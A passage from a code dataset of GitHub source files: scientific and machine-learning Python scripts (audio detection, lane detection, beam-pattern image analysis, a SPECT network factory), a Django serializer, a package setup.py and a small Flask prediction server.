Y)\n## X: np.ndarray : any_shape\n## Y: np.ndarray : shape like X\n## returns np.ndarray: X.shape + (dim,)\nt1 = time.perf_counter()\nUV = initialized_interpolant(XX, YY)\nprint('Time per interpolation: ', (time.perf_counter() - t1)/(_n*_m))\nUU = UV[:,:,0]\nVV = UV[:,:,1]\nSS = (UU**2 + VV**2)**0.5\n\n## Visualize interpolated field\n\nfig, ax = plt.subplots(1,1)\nstream = ax.streamplot(XX.T, YY.T, div(UU, SS).T, div(VV, SS).T, color = SS.T, density = 1, cmap ='autumn')\nfig.colorbar(stream.lines)\nax.set_aspect('equal')\nplt.show()\nplt.close()","repo_name":"Peteris-Zvejnieks/DivergenceFreeInterpolation","sub_path":"tests/test_case_2D.py","file_name":"test_case_2D.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"23296741163","text":"'''For serializing all data'''\n\nfrom .models import BusinessProfile, Profile\nfrom rest_framework import serializers\nfrom rest_framework.renderers import JSONRenderer\n\nclass ProfileSerializer(serializers.ModelSerializer):\n #Serializing all users profile\n\n class Meta:\n model = Profile\n fields = [\n 'username',\n 'first_name',\n 'last_name',\n 'email',\n 'date_joined',\n 'phone',\n 'wallet'\n 'profile_type'\n ]\n\nclass BusinessProfileSerializer(serializers.ModelSerializer):\n #Serializing Business profile\n\n class Meta:\n model = BusinessProfile\n fields = [\n 'user',\n 'business_name',\n 'register_date',\n 'pan_number',\n 'pan_name',\n 'address',\n 'pincode',\n 'city',\n 'state',\n 'service',\n ]\n","repo_name":"mittaltushar014/mera_pay_payments_gateway","sub_path":"business/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"10039713695","text":"\nfrom setuptools import setup, find_packages\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n\nsetup(\n name='asoc_members',\n version='0.1.0',\n\n # This is a one-line description or tagline of what your project does. This\n # corresponds to the \"Summary\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#summary\n description=\"Memberships management for the Python Argentina's ONG\",\n\n long_description=long_description,\n long_description_content_type='text/markdown',\n\n # This should be a valid link to your project's main homepage.\n #\n # This field corresponds to the \"Home-Page\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#home-page-optional\n url='https://ac.python.org.ar/',\n\n # This should be your name or the name of the organization which owns the\n # project.\n author='Asociación Civil Python Argentina', # Optional\n\n # This should be a valid email address corresponding to the author listed\n # above.\n author_email='presidencia@ac.python.org.ar', # Optional\n\n # Classifiers help users find your project by categorizing it.\n #\n # For a list of valid classifiers, see https://pypi.org/classifiers/\n classifiers=[ # Optional\n 'Development Status :: 1 - Planning',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Developers',\n\n # Pick your license as you wish\n 'License :: OSI Approved :: MIT License',\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Framework :: Django :: 2.0',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n\n keywords='python argentina pyar django memberships ong', # Optional\n\n # You can just specify package directories manually here if your project is\n # simple. Or you can use find_packages().\n #\n # Alternatively, if you just want to distribute a single Python file, use\n # the `py_modules` argument instead as follows, which will expect a file\n # called `my_module.py` to exist:\n #\n # py_modules=[\"my_module\"],\n #\n packages=find_packages(exclude=['contrib', 'docs', 'tests']),\n\n install_requires=[\n 'django',\n 'Pillow',\n 'django-extensions',\n ],\n scripts=['website/manage.py'],\n\n # List additional URLs that are relevant to your project as a dict.\n #\n # This field corresponds to the \"Project-URL\" metadata fields:\n # https://packaging.python.org/specifications/core-metadata/#project-url-multiple-use\n #\n # Examples listed include a pattern for specifying where the package tracks\n # issues, where the source is hosted, where to say thanks to the package\n # maintainers, and where to support the project financially. The key is\n # what's used to render the link text on PyPI.\n project_urls={ # Optional\n 'Bug Reports': 'https://github.com/PyAr/asoc_members/issues',\n 'About us': 'https://ac.python.org.ar/',\n 'Source': 'https://github.com/PyAr/asoc_members/',\n },\n)","repo_name":"PyAr/asoc_members","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"60"} +{"seq_id":"34076792515","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 7 15:41:54 2020\n\n@author: xavier.mouy\n\n\"\"\"\n\n# import sys\n# sys.path.append(\"..\") # Adds higher directory to python modules path.\nfrom ecosound.core.audiotools import Sound\nfrom ecosound.core.spectrogram import Spectrogram\n#from ecosound.core.measurement import Measurement\nfrom ecosound.detection.detector_builder import DetectorFactory\nfrom ecosound.visualization.grapher_builder import GrapherFactory\nfrom ecosound.measurements.measurer_builder import MeasurerFactory\nimport time\n\n## Input paraneters ##########################################################\n\n#single_channel_file = r\"../ecosound/resources/67674121.181018013806.wav\"\n#single_channel_file = r\"../ecosound/resources/JASCOAMARHYDROPHONE742_20140913T084017.774Z.wav\"\n#single_channel_file = r\"C:\\Users\\xavier.mouy\\Documents\\PhD\\Projects\\Dectector\\datasets\\DFO_snake-island_rca-in_20181017\\audio_data\\67674121.181018040806.wav\"\n\nsingle_channel_file = r'C:\\Users\\xavier.mouy\\Documents\\Projects\\2022_DFO_fish_catalog\\Darienne_data\\Taylor-Islet_LA_dep2\\data\\6\\AMAR173.6.20220821T180710Z.wav'\n\n\n# Spectrogram parameters\nframe = 0.0625 #3000\nnfft = 0.0853 # 4096\nstep = 0.01 # 500\n#ovlp = 2500\nfmin = 0\nfmax = 5000\nwindow_type = 'hann'\n\n# start and stop time of wavfile to analyze\nt1 = 700 #197 #22#24\nt2 = 800 #217 #40#24#40\n## ###########################################################################\ntic = time.perf_counter()\n\n# load audio data\nsound = Sound(single_channel_file)\nsound.read(channel=0, chunk=[t1, t2], unit='sec', detrend=True)\n\n# Calculates spectrogram\nspectro = Spectrogram(frame, window_type, nfft, step, sound.waveform_sampling_frequency, unit='sec')\nspectro.compute(sound, dB=True, use_dask=True, dask_chunks=40)\n\n# Crop unused frequencies\nspectro.crop(frequency_min=fmin, frequency_max=fmax, inplace=True)\n\n# Denoise\nspectro.denoise('median_equalizer', window_duration=3, use_dask=True, dask_chunks=(2048,1000), inplace=True)\n\n# Detector\ndetector = DetectorFactory('BlobDetector', use_dask=True, dask_chunks=(2048,2000), kernel_duration=0.1, kernel_bandwidth=300, threshold=10, duration_min=0.05, bandwidth_min=40)\ndetections = detector.run(spectro, debug=False)\n\ntoc = time.perf_counter()\nprint(f\"Executed in {toc - tic:0.4f} seconds\")\n\n# Plot\ngraph = GrapherFactory('SoundPlotter', title='Recording', frequency_max=1000)\ngraph.add_data(sound)\ngraph.add_annotation(detections, panel=0, color='grey',label='Detections')\ngraph.add_data(spectro)\ngraph.add_annotation(detections, panel=1,color='black',label='Detections')\ngraph.colormap = 'binary'\n#graph.colormap = 'jet'\ngraph.show()\n\n\n\n\n## To test the .crop method\n#detecSpectro = spectro.crop(time_min=2,time_max=10, inplace=False)\n#detecSpectro = spectro.crop(time_max=10, inplace=False)\n#detecSpectro = spectro.crop(frequency_min=50, inplace=False)\n#detecSpectro = spectro.crop(frequency_max=800,inplace=False)\n# detecSpectro = spectro.crop(frequency_min=0,frequency_max=600,time_min=10,time_max=10.3, inplace=False)\n# graph = GrapherFactory('SoundPlotter', title='Detection', frequency_max=1000)\n# graph.add_data(detecSpectro)\n# graph.show()\n\n\n\n","repo_name":"xaviermouy/ecosound","sub_path":"tests/old_tests/blob_detector.py","file_name":"blob_detector.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"31505324584","text":"import numpy as np\nimport torch\nfrom model.backbone import resnet\n# from model.layer import CoordConv\nfrom model.seg_model import SegHead\n# from torch.nn import functional as F\n# from utils.common import initialize_weights\n\n\nclass parsingNet(torch.nn.Module):\n def __init__(self, pretrained=True, backbone='50', num_grid_row = None, num_cls_row = None, \\\n num_grid_col = None, num_cls_col = None, num_lane_on_row = None, num_lane_on_col = None, \\\n use_aux=False,input_height = None, input_width = None, fc_norm = False,cls_lane=5,train_method=0):\n super(parsingNet, self).__init__()\n self.num_grid_row = num_grid_row\n self.num_cls_row = num_cls_row\n self.num_grid_col = num_grid_col\n self.num_cls_col = num_cls_col\n self.num_lane_on_row = num_lane_on_row\n self.num_lane_on_col = num_lane_on_col\n self.use_aux = use_aux\n self.train_method = train_method\n self.num_lane = 4\n self.cls_lane = cls_lane\n self.cls_out = self.num_lane*self.cls_lane # num_lane * cls_lane \n \n self.dim1 = self.num_grid_row * self.num_cls_row * self.num_lane_on_row\n self.dim2 = self.num_grid_col * self.num_cls_col * self.num_lane_on_col\n self.dim3 = 2 * self.num_cls_row * self.num_lane_on_row\n self.dim4 = 2 * self.num_cls_col * self.num_lane_on_col\n self.total_dim = self.dim1 + self.dim2 + self.dim3 + self.dim4 + self.cls_out\n \n self.input_dim = input_height // 32 * input_width // 32 * 8\n\n if self.train_method==0 or self.train_method==1:\n self.model = resnet(backbone, pretrained=pretrained).requires_grad_(requires_grad=True)\n if backbone in ['34','18', '34fca']:\n self.pool = torch.nn.Conv2d(512,256,1).requires_grad_(requires_grad=True) \n else:\n raise ValueError\n # 57600 32400 576 648 20\n print('self.dim1,self.dim2,self.dim3,self.dim4,self.cls_out: ',self.dim1,self.dim2,self.dim3,self.dim4,self.cls_out)\n self.cls_loc_row = torch.nn.Sequential(\n torch.nn.Conv2d(32,4,3,1),\n torch.nn.Flatten(),\n torch.nn.LayerNorm(1536) if fc_norm else torch.nn.Identity(),\n torch.nn.ReLU(),\n torch.nn.Linear(1536,self.dim1) # 57600)\n ).requires_grad_(requires_grad=True)\n self.cls_loc_col = torch.nn.Sequential(\n torch.nn.Conv2d(32,4,3,1),\n torch.nn.Flatten(),\n torch.nn.LayerNorm(1536) if fc_norm else torch.nn.Identity(),\n torch.nn.ReLU(),\n torch.nn.Linear(1536,self.dim2) #32400)\n ).requires_grad_(requires_grad=True)\n \n self.cls_ext_row = torch.nn.Sequential(\n torch.nn.Conv2d(32,2,3,2),\n torch.nn.Flatten(),\n torch.nn.LayerNorm(192) if fc_norm else torch.nn.Identity(),\n torch.nn.ReLU(),\n torch.nn.Linear(192,self.dim3) #576)\n ).requires_grad_(requires_grad=True)\n self.cls_ext_col = torch.nn.Sequential(\n torch.nn.Conv2d(32,2,3,2),\n torch.nn.Flatten(),\n torch.nn.LayerNorm(192) if fc_norm else torch.nn.Identity(),\n torch.nn.ReLU(),\n torch.nn.Linear(192,self.dim4) #648) \n ).requires_grad_(requires_grad=True)\n else:\n self.model = resnet(backbone, pretrained=pretrained).requires_grad_(requires_grad=False) \n if backbone in ['34','18', '34fca']:\n self.pool = torch.nn.Conv2d(512,256,1).requires_grad_(requires_grad=False) \n else:\n raise ValueError\n # 57600 32400 576 648 20\n # print('self.dim1,self.dim2,self.dim3,self.dim4,self.cls_out: ',self.dim1,self.dim2,self.dim3,self.dim4,self.cls_out)\n self.cls_loc_row = torch.nn.Sequential(\n torch.nn.Conv2d(32,4,3,1),\n torch.nn.Flatten(),\n torch.nn.LayerNorm(1536) if fc_norm else torch.nn.Identity(),\n torch.nn.ReLU(),\n torch.nn.Linear(1536,self.dim1)# 57600)\n ).requires_grad_(requires_grad=False) \n self.cls_loc_col = torch.nn.Sequential(\n torch.nn.Conv2d(32,4,3,1),\n torch.nn.Flatten(),\n torch.nn.LayerNorm(1536) if fc_norm else torch.nn.Identity(),\n torch.nn.ReLU(),\n torch.nn.Linear(1536,self.dim2) #32400)\n ).requires_grad_(requires_grad=False) \n \n self.cls_ext_row = torch.nn.Sequential(\n torch.nn.Conv2d(32,2,3,2),\n torch.nn.Flatten(),\n torch.nn.LayerNorm(192) if fc_norm else torch.nn.Identity(),\n torch.nn.ReLU(),\n torch.nn.Linear(192,self.dim3) #576)\n ).requires_grad_(requires_grad=False) \n self.cls_ext_col = torch.nn.Sequential(\n torch.nn.Conv2d(32,2,3,2),\n torch.nn.Flatten(),\n torch.nn.LayerNorm(192) if fc_norm else torch.nn.Identity(),\n torch.nn.ReLU(),\n torch.nn.Linear(192,self.dim4)#648) \n ).requires_grad_(requires_grad=False) \n if self.train_method==0 or self.train_method==2:\n self.cls_lan_cls = torch.nn.Sequential(\n torch.nn.Conv2d(256,128,3,2),\n torch.nn.Conv2d(128,4,3,2),\n torch.nn.Flatten(),\n torch.nn.LayerNorm(384) if fc_norm else torch.nn.Identity(),\n torch.nn.ReLU(),\n torch.nn.Linear(384,self.cls_out)).requires_grad_(requires_grad=True)\n else:\n self.cls_lan_cls = torch.nn.Sequential(\n torch.nn.Conv2d(256,128,3,2),\n torch.nn.Conv2d(128,4,3,2),\n torch.nn.Flatten(),\n torch.nn.LayerNorm(384) if fc_norm else torch.nn.Identity(),\n torch.nn.ReLU(),\n torch.nn.Linear(384,self.cls_out)).requires_grad_(requires_grad=False)\n\n if self.use_aux:\n self.seg_head = SegHead(backbone, num_lane_on_row + num_lane_on_col)\n # initialize_weights(self.cls)\n def forward(self, x):\n\n x2,x3,fea = self.model(x) # 是layer-2,layer-3,layer-4\n if self.use_aux:\n seg_out = self.seg_head(x2, x3,fea)\n fea = self.pool(fea)\n \n cls_loc_row = fea[:,128:160,...]\n cls_loc_row = self.cls_loc_row(cls_loc_row)\n \n cls_loc_col = fea[:,160:192,...]\n cls_loc_col = self.cls_loc_col(cls_loc_col)\n \n cls_ext_row = fea[:,192:224,...]\n cls_ext_row = self.cls_ext_row(cls_ext_row)\n \n cls_ext_col = fea[:,224:,...]\n cls_ext_col = self.cls_ext_col(cls_ext_col)\n \n cls_lan_cls = x3\n cls_lan_cls = self.cls_lan_cls(cls_lan_cls)\n \n fea = cls_ext_row\n pred_dict = {\n 'loc_row': cls_loc_row.view(-1,self.num_grid_row, self.num_cls_row, self.num_lane_on_row), \n 'loc_col': cls_loc_col.view(-1, self.num_grid_col, self.num_cls_col, self.num_lane_on_col),\n 'exist_row':cls_ext_row.view(-1, 2, self.num_cls_row, self.num_lane_on_row), \n 'exist_col': cls_ext_col.view(-1, 2, self.num_cls_col, self.num_lane_on_col),\n # # 'lane_labels': F.softmax(out[:,-self.cls_out:].reshape([-1, self.num_lane,self.cls_lane]),dim=1)} #! gai 加了一个softmax 收敛慢\n 'lane_labels': cls_lan_cls.reshape([-1, self.num_lane,self.cls_lane])\n } #! gai \n if self.use_aux:\n pred_dict['seg_out'] = seg_out\n return pred_dict\n # for k,v in pred_dict.items():\n # print(k,' : ',v.shape)\n # return fea\n\n def forward_tta(self, x):\n x2,x3,fea = self.model(x)\n \n pooled_fea = self.pool(fea)\n n,c,h,w = pooled_fea.shape\n\n left_pooled_fea = torch.zeros_like(pooled_fea)\n right_pooled_fea = torch.zeros_like(pooled_fea)\n up_pooled_fea = torch.zeros_like(pooled_fea)\n down_pooled_fea = torch.zeros_like(pooled_fea)\n\n left_pooled_fea[:,:,:,:w-1] = pooled_fea[:,:,:,1:]\n left_pooled_fea[:,:,:,-1] = pooled_fea.mean(-1)\n \n right_pooled_fea[:,:,:,1:] = pooled_fea[:,:,:,:w-1]\n right_pooled_fea[:,:,:,0] = pooled_fea.mean(-1)\n\n up_pooled_fea[:,:,:h-1,:] = pooled_fea[:,:,1:,:]\n up_pooled_fea[:,:,-1,:] = pooled_fea.mean(-2)\n\n down_pooled_fea[:,:,1:,:] = pooled_fea[:,:,:h-1,:]\n down_pooled_fea[:,:,0,:] = pooled_fea.mean(-2)\n # 10 x 25\n fea = torch.cat([pooled_fea, left_pooled_fea, right_pooled_fea, up_pooled_fea, down_pooled_fea], dim = 0)\n fea = fea.view(-1, self.input_dim)\n\n out = self.cls(fea)\n\n return {'loc_row': out[:,:self.dim1].view(-1,self.num_grid_row, self.num_cls_row, self.num_lane_on_row), \n 'loc_col': out[:,self.dim1:self.dim1+self.dim2].view(-1, self.num_grid_col, self.num_cls_col, self.num_lane_on_col),\n 'exist_row': out[:,self.dim1+self.dim2:self.dim1+self.dim2+self.dim3].view(-1, 2, self.num_cls_row, self.num_lane_on_row), \n 'exist_col': out[:,-self.dim4:].view(-1, 2, self.num_cls_col, self.num_lane_on_col),\n 'lane_labels': out[:,-self.cls_out:].reshape([-1, self.num_lane,self.cls_lane])} \n\ndef get_model(cfg):\n return parsingNet(pretrained = True, backbone=cfg.backbone, \n num_grid_row = cfg.num_cell_row, num_cls_row = cfg.num_row, num_grid_col = cfg.num_cell_col, \\\n num_cls_col = cfg.num_col, num_lane_on_row = cfg.num_lanes, num_lane_on_col = cfg.num_lanes, \\\n use_aux = cfg.use_aux, input_height = cfg.train_height, \\\n input_width = cfg.train_width, fc_norm = cfg.fc_norm, \\\n cls_lane=cfg.cls_lane,train_method=cfg.train_method).cuda()","repo_name":"Salary-only-17k/Ultra-Fast-Lane-Detection-v2-pp","sub_path":"model/model_culane.py","file_name":"model_culane.py","file_ext":"py","file_size_in_byte":10107,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"2227308190","text":"#!/usr/bin/env python\n\nimport os \n\nimport argparse\n\nimport yaml\n\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom matplotlib.patches import Rectangle\n\nimport numpy as np\n\nimport scipy\nfrom scipy.ndimage.filters import gaussian_filter\n\nfrom iminuit import Minuit\nfrom probfit import BinnedChi2, Extended, gaussian, Chi2Regression\n\n__version__ = \"1.0\"\n\n\nclass Hist1D(object):\n\tdef __init__(self, nbins, xlow, xhigh):\n\t\tself.nbins = nbins\n\t\tself.xlow = xlow\n\t\tself.xhigh = xhigh\n\t\tself.hist, self.edges = np.histogram([], bins=nbins, range=(xlow, xhigh))\n\t\tself.bins = (self.edges[:-1] + self.edges[1:]) / 2.\n\n\tdef fill(self, value):\n\t\thist, edges = np.histogram([value], bins=self.nbins, range=(self.xlow, self.xhigh))\n\t\tself.hist += hist\n\n\t@property\n\tdef data(self):\n\t\treturn self.bins, self.hist\n\ndef crop_center(img,cropx,cropy):\n y,x = img.shape\n startx = x//2-(cropx//2)\n starty = y//2-(cropy//2) \n return img[starty:starty+cropy,startx:startx+cropx]\n\ndef mm2pix(mm):\n\treturn int(mm * 600.0/25.4)\n\ndef fill_value_to_outer(img,fill_value,xmin,xmax,ymin,ymax):\n\tnew_img = np.copy(img)\n\tfor i in range(len(img)):\n\t\tfor j in range(len(img[i])):\n\t\t\tif i <= xmin or i >= xmax:\n\t\t\t\tnew_img[i][j] = fill_value\n\t\t\tif j <= ymin or j >= ymax:\n\t\t\t\tnew_img[i][j] = fill_value\n\treturn new_img\n\ndef get_sum_values(img,xcen,ycen,xwid,ywid,filter_value=999999999):\n\t# xrange: xcen - xwid / 2 ... xcen + xwid / 2\n\tsummed_value = 0.0\n\tsummed_pixel = 0\n\tfor i in range(len(img)):\n\t\tfor j in range(len(img[i])):\n\t\t\tif (xcen-0.5*xwid) <= i <= (xcen+0.5*xwid) and (ycen-0.5*ywid) <= j <= (ycen+0.5*ywid):\n\t\t\t\tif img[i][j] <= filter_value:\n\t\t\t\t\tsummed_value += img[i][j]\n\t\t\t\t\tsummed_pixel += 1\t\t\t\t\t\n\trect = Rectangle((xcen-0.5*xwid,ycen-0.5*ywid),\n\t\txwid,ywid,fill=False,ec='r',lw=3)\n\treturn (summed_value,summed_pixel,rect)\n\ndef analyze_image(yamlfile,outdir='data/210511/output'):\n\tparam = yaml.load(open(yamlfile))\n\n\t# 600 dpi\n\t# 25.4 mm / 600 pix = 0.0423 mm/pix \n\t# 80.0 mm <--> 1,891 pix\n\t# pix2mm = 25.4 / 600.0 \n\n\tinfile = param['infile']\n\tbasename = os.path.basename(os.path.splitext(infile)[0])\n\n\tfout = open('%s/%s.out' % (outdir,basename),'w')\n\tfout.write(\"%s\\n\" % infile)\n\n\t# Using Mac preview, extract 1,891 pixel square image from the original scanned file.\n\timage_raw = np.array(Image.open(infile).convert('L'))\n\n\tprint(image_raw)\n\tprint(image_raw.shape)\n\n\t# prepare a canvas\n\tfig = plt.figure(figsize=(8,7),tight_layout=True)\n\tax = fig.add_subplot(111,title=param['title'])\n\tax.set_xlabel('Pixel size (0.0423 mm/pix)')\t\t\n\tax.set_ylabel('Pixel size')\n\n\t# plot the raw pixel image\n\taxis_image = plt.imshow(image_raw,aspect='equal',cmap='gist_gray',origin='lower')\n\n\t# add 10 mm line \n\txstart=100\n\tystart=100\n\tplt.plot([xstart,xstart+mm2pix(10.0)],[ystart,ystart],\"-w\")\n\tplt.text(150,120,\"10 mm\",color='w')\n\n\t# filtered image and get the maximum point \n\timage_filtered = gaussian_filter(image_raw,param['gaussian_filter_sigma'])\n\timage_center = fill_value_to_outer(image_filtered,param['fill_value'],param['fill_edge'],1891-param['fill_edge'],param['fill_edge'],1891-param['fill_edge'])\n\tbeam_center_pos = np.unravel_index(np.argmin(image_center),image_center.shape)\n\tplt.plot(beam_center_pos[0],beam_center_pos[1],'*r',\n\t\tlabel='Beam center',markersize=20)\n\n\t# add grid and color bar\n\tplt.grid(color='#979A9A', linestyle='--', linewidth=1)\n\tdivider = make_axes_locatable(ax)\n\tcax = divider.append_axes(\"right\", size=\"5%\", pad=0.08)\t\t\t\n\tfig.colorbar(axis_image, cax=cax, label='gray scale (black:0, white:255)')\n\n\t# add contour after gaussian smoothing\n\taxis_contour = ax.contour(gaussian_filter(image_raw,param['gaussian_filter_sigma']),\n\t\tcmap=\"autumn\")\n\tax.clabel(axis_contour)\n\n\toutpdf = '%s/%s_rawimage.pdf' % (outdir,basename)\n\tfig.savefig(outpdf)\n\n\t###### \n\n\t#hist_pix, edges_pix = np.histogram(image_raw.flatten(),\n\t#\tbins=2**7,range=(0,2**7))\n\t#x_pix = 0.5*(edges_pix[1:]+edges_pix[:-1])\n\t#fig = plt.figure(figsize=(8,7),tight_layout=True)\n\t#plt.plot(x_pix,hist_pix,marker='', drawstyle='steps-mid')\n\t#plt.xlabel('Pixel value')\n\t#plt.ylabel('Number of pixels')\n\t#fig.savefig('hist.pdf')\n\n\tfig = plt.figure(figsize=(8,7),tight_layout=True)\n\text_gauss = Extended(gaussian)\n\tbc2 = BinnedChi2(ext_gauss, image_raw.flatten(),\n\t\tbins=param['fit_bins'])\n\tm = Minuit(bc2, mean=param['fit_mean'],\n\t\tsigma=param['fit_sigma'], N=param['fit_N'])\n\tm.migrad() # fit\n\tm.print_param()\n\tbc2.draw(m)\n\n\toutpdf = '%s/%s_pixfit.pdf' % (outdir,basename)\n\tfig.savefig(outpdf)\n\n\tflat_pixel_mean = m.values[0]\n\tflat_pixel_sigma = m.values[1]\t\n\n\tfilter_setting = 3 * flat_pixel_sigma\n\tprint(\"filter_setting: %.1f\" % filter_setting)\n\n\timage_flatsub = image_raw-flat_pixel_mean\n\n\t# prepare a canvas\n\tfig = plt.figure(figsize=(8,7),tight_layout=True)\n\tax = fig.add_subplot(111,title=param['title'])\n\tax.set_xlabel('Pixel size (0.0423 mm/pix)')\t\t\n\tax.set_ylabel('Pixel size')\n\n\t# plot the raw pixel image\n\taxis_image = plt.imshow(image_flatsub,aspect='equal',cmap='gist_gray',origin='lower')\n\n\t# add 10 mm line \n\txstart=100\n\tystart=100\n\tplt.plot([xstart,xstart+mm2pix(10.0)],[ystart,ystart],\"-w\")\n\tplt.text(150,120,\"10 mm\",color='w')\n\n\t# filtered image and get the maximum point \n\timage_filtered = gaussian_filter(image_flatsub,param['gaussian_filter_sigma'])\n\timage_center = fill_value_to_outer(image_filtered,param['fill_value'],param['fill_edge'],1891-param['fill_edge'],param['fill_edge'],1891-param['fill_edge'])\n\tbeam_center_pos = np.unravel_index(np.argmin(image_center),image_center.shape)\n\tplt.plot(beam_center_pos[0],beam_center_pos[1],'*r',\n\t\tlabel='Beam center',markersize=20)\n\n\t# add grid and color bar\n\tplt.grid(color='#979A9A', linestyle='--', linewidth=1)\n\tdivider = make_axes_locatable(ax)\n\tcax = divider.append_axes(\"right\", size=\"5%\", pad=0.08)\t\t\t\n\tfig.colorbar(axis_image, cax=cax, label='gray scale (black:0, white:255)')\n\n\t# add contour after gaussian smoothing\n\taxis_contour = ax.contour(gaussian_filter(image_flatsub,param['gaussian_filter_sigma']),\n\t\tlevels=[-9*flat_pixel_sigma,-6*flat_pixel_sigma,-3*flat_pixel_sigma,-flat_pixel_sigma,flat_pixel_sigma,3*flat_pixel_sigma],\n\t\tcmap=\"autumn\")\n\tax.clabel(axis_contour)\n\n\ta60_value,a60_pixel,a60rect = get_sum_values(image_flatsub,\n\t\tparam['center_x'],param['center_y'],mm2pix(param['wide_wid_x']),mm2pix(param['wide_wid_y']),\n#\t\tparam['center_x'],param['center_y'],mm2pix(45),mm2pix(45),\n\t\tfilter_value=filter_setting)\n\tax.add_patch(a60rect) \n\tprint(\"Area60\",a60_value,a60_pixel)\n\n\ta10_value,a10_pixel,a10rect = get_sum_values(image_flatsub,\n\t\tparam['center_x'],param['center_y'],mm2pix(param['center_wid_x']),mm2pix(param['center_wid_y']),\n\t\tfilter_value=filter_setting)\n\tax.add_patch(a10rect) \n\tprint(\"Area10\",a10_value,a10_pixel)\n\n\tfout.write(\"Rect60mm_TotalValue:%d\\n\" % a60_value)\n\tfout.write(\"Rect60mm_TotalPixel:%d\\n\" % a60_pixel)\t\n\tfout.write(\"Rect60mm_TotalRate:%.3e\\n\" % (float(a60_value)/float(a60_pixel)))\n\n\tfout.write(\"Rect10mm_TotalValue:%d\\n\" % a10_value)\n\tfout.write(\"Rect10mm_TotalPixel:%d\\n\" % a10_pixel)\t\n\tfout.write(\"Rect10mm_TotalRate:%.3e\\n\" % (float(a10_value)/float(a10_pixel)))\n\n\tfout.write(\"Rect10mmTo60mm_TotalValueRatio:%.3e\\n\" % (float(a10_value)/float(a60_value)))\n\tfout.write(\"Rect10mmTo60mm_TotalPixelRatio:%.3e\\n\" % (float(a10_pixel)/float(a10_pixel)))\n\tfout.write(\"Rect10mmTo60mm_TotalRateRatio:%.3e\\n\" % ((float(a10_value)/float(a10_pixel))/(float(a60_value)/float(a60_pixel))))\n\tfout.close()\n\n\toutpdf = '%s/%s_flatsub.pdf' % (outdir,basename)\n\tfig.savefig(outpdf)\n\ndef get_parser():\n\t\"\"\"\n\tCreates a new argument parser.\n\t\"\"\"\n\tparser = argparse.ArgumentParser('analyze_beam_pattern.py',\n\t\tformatter_class=argparse.RawDescriptionHelpFormatter,\n\t\tdescription=\"\"\"\n\t\tAnalyze beam pattern.\n\t\t\"\"\"\n\t\t)\n\tversion = '%(prog)s ' + __version__\n\tparser.add_argument('--yamlfile', '-i', type=str, \n\t\thelp='Input yamlfile')\t\n\treturn parser\n\ndef main(args=None):\n\tparser = get_parser()\n\targs = parser.parse_args(args)\n\tanalyze_image(args.yamlfile)\n\nif __name__==\"__main__\":\n\tmain()\n","repo_name":"tenoto/ninjatools","sub_path":"ninjatools/analyze_beam_pattern.py","file_name":"analyze_beam_pattern.py","file_ext":"py","file_size_in_byte":8055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28593251357","text":"import torch.nn as nn\nimport numpy as np\nfrom utils import arange\nfrom networks.networks import scSERDUNet\nimport pdb\n\n\ndef set_gpu(network, gpu_ids):\n network.to(gpu_ids[0]) # Default to the 1st GPU\n network = nn.DataParallel(network, device_ids=gpu_ids) # Parallel computing on multiple GPU\n\n return network\n\n\ndef get_generator(name, opts):\n # DuRDN\n if name == 'DuRDN':\n ic = 1\n if opts.use_state:\n ic = ic +1\n if opts.use_scatter:\n ic = ic + 1\n if opts.use_scatter2:\n ic = ic + 1\n if opts.use_scatter3:\n ic = ic + 1\n if opts.use_bmi:\n ic = ic + 1\n if opts.use_gender:\n ic = ic + 1\n network = scSERDUNet(n_channels=ic, n_filters=32, n_denselayer=6, growth_rate=32, norm=opts.norm)\n\n\n num_param = sum([p.numel() for p in network.parameters() if p.requires_grad])\n print('Number of parameters of Generator: {}'.format(num_param))\n\n return set_gpu(network, opts.gpu_ids)\n\n","repo_name":"XiongchaoChen/DuRDN_CardiacSPECT_AC","sub_path":"networks/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"14598628582","text":"from flask import Flask, request, jsonify, render_template\nimport base64, json\nfrom io import BytesIO\nfrom model.model import MyModel\nimport numpy as np\n\nHOST = '0.0.0.0'\nPORT = 8888\n\napp = Flask(__name__)\n\nmodel = MyModel('./model/trained_weights.pth', 'cpu')\nCLASS_MAPPING = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabdefghnqrt'\n\n@app.route('/')\ndef home():\n return render_template(\"home.html\")\n\n@app.route('/predict', methods=['GET','POST'])\ndef predict():\n results = {\"prediction\" :\"Empty\", \"probability\" :{}}\n\n # get data\n input_img = BytesIO(base64.urlsafe_b64decode(request.form['img']))\n\n # model.predict method takes the raw data and output a vector of probabilities\n res = model.predict(input_img)\n\n results[\"prediction\"] = str(CLASS_MAPPING[np.argmax(res)])\n results[\"probability\"] = float(np.max(res))*100\n \n # output data\n return json.dumps(results)\n\nif __name__ == '__main__':\n \n app.run(host=HOST,\n debug=True,\n 